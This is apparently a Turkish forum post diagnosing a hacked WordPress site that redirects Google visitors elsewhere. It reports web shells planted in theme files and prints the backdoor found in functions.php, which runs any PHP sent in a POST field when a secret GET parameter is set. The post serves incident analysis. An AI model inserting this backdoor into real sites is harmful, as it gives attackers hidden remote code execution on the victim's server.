Eğer sitenize direk erişim yapılıyor, ama googleden aratıldığında girilemiyorsa siteniz hack yemiş ve yönlendirme koduyla yönlendirilmiş demektir.
Yani arkadaşın sitesine direk erişim var ama googleden gelenlere başka bir siteye yönlendirme yapılmış.
Bu yönlendirmeler nasıl yapılır?
1. Yöntem Htacess - kontrol ettim oraya dokunulmamıştır.
2. Yöntem index.php ona da dokunulmamıştır.
3. Yöntem tema dosyaları - Hackleyen kişi tema dosyalarına aşağıdaki kodları girmiş.
31.ocak.2015 tarihinde temadaki aşağıdaki dosyalar değişikliğe uğramış.
404.php içine shell basılmış.
archive.php buna da shell basılmıs.
30.ocak2015 tarihinde functions php ye aşağıdaki kod eklenmiş.
function _g3t($str){
$val = !empty($_GET[$str]) ? $_GET[$str] : null;
return $val;
}
if(_g3t('eeK')=='f')
{
@eval($_POST['NWZAF']);
exit;
}
if(_g3t('eeK')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>
Tahminim adamlar güzel bi if else döngüsü kurarak siteyi site sahibi anlamadan yönlendirme yaparak piç etmişler.
Saçma sapan alakasız mesajlarla yardımcı olayım derken kimsenin kafasını bulandırmayınız.
Yok efendim Sunucu IP si spam olmuş bilmemne tüm siteler spama düşecekmiş falan filan.